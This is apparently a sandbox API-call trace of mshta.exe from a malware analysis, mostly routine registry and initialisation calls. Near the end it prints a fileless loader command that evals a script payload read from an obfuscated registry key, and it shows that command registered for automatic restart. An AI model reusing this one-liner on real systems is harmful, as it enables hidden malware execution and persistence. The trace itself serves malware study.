__dllonexit () returned 0x74d16e07 [0064.998] __dllonexit () returned 0x74d176cb [0064.998] __dllonexit () returned 0x74d16e1a [0064.998] __dllonexit () returned 0x74d172aa [0064.998] __dllonexit () returned 0x74d172cb [0064.999] __dllonexit () returned 0x74d16e3a [0064.999] GetCurrentThreadId () returned 0x2a8 [0064.999] CoCreateGuid (in: pguid=0x7502ad20 | out: pguid=0x7502ad20*(Data1=0xba75a517, Data2=0x7509, Data3=0x4d6f, Data4=([0]=0x96, [1]=0x2c, [2]=0xfd, [3]=0xfb, [4]=0xcb, [5]=0x3f, [6]=0x37, [7]=0x6a))) returned 0x0 [0065.001] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x200) returned 0x62e740 [0065.001] __dllonexit () returned 0x74d1733d [0065.001] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ef48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.001] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.001] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0065.001] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0065.001] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x62e948 [0065.001] SHRegGetValueW () returned 0x2 [0065.002] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f194 | out: phkResult=0x18f194*=0x0) returned 0x2 [0065.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f190 | out: phkResult=0x18f190*=0x0) returned 0x2 [0065.002] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.084] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.089] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.089] RegCloseKey (hKey=0x0) returned 0x6 [0065.089] RegCloseKey (hKey=0x0) returned 0x6 [0065.089] RegCloseKey (hKey=0x94) returned 0x0 [0065.089] RegCloseKey (hKey=0x98) returned 0x0 [0065.089] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.089] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.089] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x98) returned 0x0 [0065.090] RegCloseKey (hKey=0x94) returned 0x0 [0065.090] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.090] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.090] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x0) returned 0x6 [0065.090] RegCloseKey (hKey=0x94) returned 0x0 [0065.090] RegCloseKey (hKey=0x98) returned 0x0 [0065.091] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.091] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.091] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.091] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x9c) returned 0x0 [0065.091] SHRegGetValueW () returned 0x2 [0065.091] SHRegGetValueW () returned 0x2 [0065.091] RegCloseKey (hKey=0x9c) returned 0x0 [0065.091] RegCloseKey (hKey=0x0) returned 0x6 [0065.091] RegCloseKey (hKey=0x0) returned 0x6 [0065.091] RegCloseKey (hKey=0x98) returned 0x0 [0065.091] RegCloseKey (hKey=0x94) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.092] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.092] RegCloseKey (hKey=0x0) returned 0x6 [0065.092] RegCloseKey (hKey=0x0) returned 0x6 [0065.092] RegCloseKey (hKey=0x94) returned 0x0 [0065.092] RegCloseKey (hKey=0x98) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.092] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.093] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegCloseKey (hKey=0x0) returned 0x6 [0065.093] RegCloseKey (hKey=0x0) returned 0x6 [0065.093] RegCloseKey (hKey=0x98) returned 0x0 [0065.093] RegCloseKey (hKey=0x94) returned 0x0 [0065.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.093] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.093] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.093] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x94) returned 0x0 [0065.094] RegCloseKey (hKey=0x98) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.094] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.094] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x0) returned 0x6 [0065.094] RegCloseKey (hKey=0x98) returned 0x0 [0065.094] RegCloseKey (hKey=0x94) returned 0x0 [0065.094] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.095] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.095] RegCloseKey (hKey=0x0) returned 0x6 [0065.095] RegCloseKey (hKey=0x0) returned 0x6 [0065.095] RegCloseKey (hKey=0x94) returned 0x0 [0065.095] RegCloseKey (hKey=0x98) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.096] RegCloseKey (hKey=0x98) returned 0x0 [0065.096] RegCloseKey (hKey=0x94) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x94) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.096] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.096] RegCloseKey (hKey=0x0) returned 0x6 [0065.097] RegCloseKey (hKey=0x94) returned 0x0 [0065.097] RegCloseKey (hKey=0x98) returned 0x0 [0065.097] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.097] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x94) returned 0x0 [0065.097] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.097] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.097] RegCloseKey (hKey=0x0) returned 0x6 [0065.097] RegCloseKey (hKey=0x0) returned 0x6 [0065.097] RegCloseKey (hKey=0x98) returned 0x0 [0065.097] RegCloseKey (hKey=0x94) returned 0x0 [0065.097] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0065.099] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.099] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x9c) returned 0x0 [0065.099] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.099] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.099] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x98) returned 0x0 [0065.100] RegCloseKey (hKey=0x9c) returned 0x0 [0065.100] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x9c) returned 0x0 [0065.100] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x98) returned 0x0 [0065.100] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.100] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.100] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x0) returned 0x6 [0065.100] RegCloseKey (hKey=0x9c) returned 0x0 [0065.100] RegCloseKey (hKey=0x98) returned 0x0 [0065.100] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f188 | out: phkResult=0x18f188*=0x98) returned 0x0 [0065.101] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f18c | out: phkResult=0x18f18c*=0x9c) returned 0x0 [0065.101] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.101] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x18f148 | out: phkResult=0x18f148*=0x0) returned 0x2 [0065.101] RegCloseKey (hKey=0x0) returned 0x6 [0065.101] RegCloseKey (hKey=0x0) returned 0x6 [0065.101] RegCloseKey (hKey=0x98) returned 0x0 [0065.101] RegCloseKey (hKey=0x9c) returned 0x0 [0065.101] GetSystemMetrics (nIndex=68) returned 4 [0065.101] GetSystemMetrics (nIndex=69) returned 4 [0065.102] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0065.102] GetSystemDefaultLCID () returned 0x409 [0065.103] GetVersionExW (in: lpVersionInformation=0x18f0ec*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x77c6e36c, dwMinorVersion=0x77c6e0d2, dwBuildNumber=0x7502afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f0ec*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.103] GetUserDefaultUILanguage () returned 0x409 [0065.103] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x18f03c, cchData=16 | out: lpLCData="\x03") returned 16 [0065.202] GetKeyboardLayoutList (in: nBuff=32, lpList=0x18f06c | out: lpList=0x18f06c) returned 1 [0065.202] GetSystemMetrics (nIndex=4096) returned 0 [0065.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f190 | out: phkResult=0x18f190*=0x9c) returned 0x0 [0065.202] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f194 | out: phkResult=0x18f194*=0x98) returned 0x0 [0065.202] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f150 | out: phkResult=0x18f150*=0x0) returned 0x2 [0065.203] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x18f150 | out: phkResult=0x18f150*=0x0) returned 0x2 [0065.203] RegCloseKey (hKey=0x0) returned 0x6 [0065.203] RegCloseKey (hKey=0x0) returned 0x6 [0065.203] RegCloseKey (hKey=0x9c) returned 0x0 [0065.203] RegCloseKey (hKey=0x98) returned 0x0 [0065.203] GetModuleFileNameW (in: hModule=0x74af0000, lpFilename=0x18eff8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll")) returned 0x1e [0065.203] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x3e) returned 0x623cf0 [0065.203] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0065.203] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0065.203] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0065.203] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0065.203] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0065.203] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc16c [0065.203] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc16d [0065.203] GetDC (hWnd=0x0) returned 0x100109eb [0065.203] SHCreateShellPalette (hdc=0x0) returned 0xe0806be [0065.204] GetPaletteEntries (in: hpal=0xe0806be, iStart=0x0, cEntries=0x100, pPalEntries=0x7502a494 | out: pPalEntries=0x7502a494) returned 0x100 [0065.204] SHGetInverseCMAP (in: pbMap=0x75028a7c, cbMap=0x4 | out: pbMap=0x75028a7c) returned 0x0 [0065.204] GetDeviceCaps (hdc=0x100109eb, index=38) returned 32409 [0065.204] ReleaseDC (hWnd=0x0, hDC=0x100109eb) returned 1 [0065.204] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20a) returned 0x62e988 [0065.204] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2000) returned 0x62f3a0 [0065.205] GetCurrentProcessId () returned 0x5bc [0065.205] _vsnprintf (in: _DstBuf=0x18f53c, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x18f204 | out: _DstBuf="#MSHTML#PERF#000005BC") returned 21 [0065.205] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#000005BC") returned 0x0 [0065.205] GetVersionExW (in: lpVersionInformation=0x18f220*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x613660, dwMinorVersion=0x100, dwBuildNumber=0x62db88, dwPlatformId=0x610000, szCSDVersion="A") | out: lpVersionInformation=0x18f220*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0065.205] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0065.205] GetProcAddress (hModule=0x77710000, lpProcName="EventWrite") returned 0x77ca0c59 [0065.205] GetProcAddress (hModule=0x77710000, lpProcName="EventRegister") returned 0x77c7f6ba [0065.205] GetProcAddress (hModule=0x77710000, lpProcName="EventUnregister") returned 0x77c99241 [0065.206] EtwEventRegister () returned 0x0 [0065.206] EtwRegisterTraceGuidsW () returned 0x0 [0065.206] EtwRegisterTraceGuidsW () returned 0x0 [0065.206] EtwEventRegister () returned 0x0 [0065.206] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office14\\outllib.dll", lpdwHandle=0x18efec | out: lpdwHandle=0x18efec) returned 0x0 [0065.207] GetModuleHandleW (lpModuleName=0x0) returned 0x970000 [0065.207] GetModuleFileNameW (in: hModule=0x970000, lpFilename=0x18eff8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.207] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.209] GetCurrentProcessId () returned 0x5bc [0065.209] GetCurrentProcessId () returned 0x5bc [0065.211] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xbc [0065.211] GetLastError () returned 0xb7 [0065.211] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xc0 [0065.211] MapViewOfFile (hFileMappingObject=0xc0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1a0000 [0065.288] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a1de8 | out: hHeap=0x5a0000) returned 1 [0065.288] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a0e78 | out: hHeap=0x5a0000) returned 1 [0065.288] RegCloseKey (hKey=0x42) returned 0x0 [0065.288] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0065.289] GetProcAddress (hModule=0x76d30000, lpProcName="RegisterApplicationRestart") returned 0x76d6b53c [0065.289] lstrlenA (lpString="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") returned 102 [0065.289] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xce) returned 0x5a1de8 [0065.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x612af2, cbMultiByte=-1, lpWideCharStr=0x5a1de8, cchWideChar=103 | out: lpWideCharStr="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") returned 103 [0065.289] RegisterApplicationRestart (pwzCommandline="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", dwFlags=0x0) returned 0x0 [0065.289] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a1de8 | out: hHeap=0x5a0000) returned 1 [0065.289] GetProcAddress (hModule=0x74af0000, lpProcName="RunHTMLApplication") returned 0x74b4e710 [0065.289] GetCommandLineW () returned="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" [0065.290] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd2) returned 0x6352a8 [0065.290] OleInitialize (pvReserved=0x0) returned 0x0 [0065.602] IsWindow (hWnd=0x0) returned 0 [0065.602] RegisterClassW (lpWndClass=0x18f8a4) returned 0xc059 [0065.603] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x50116 [0065.604] NtdllDefWindowProc_W () returned 0x0 [0065.604] NtdllDefWindowProc_W () returned 0x1 [0065.605] NtdllDefWindowProc_W () returned 0x0 [0065.608] NtdllDefWindowProc_W () returned 0x0 [0065.608] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x50116, hMenu=0x0, hInstance=0x970000, lpParam=0x75029680) returned 0x40162 [0065.609] NtdllDefWindowProc_W () returned 0x0 [0065.609] 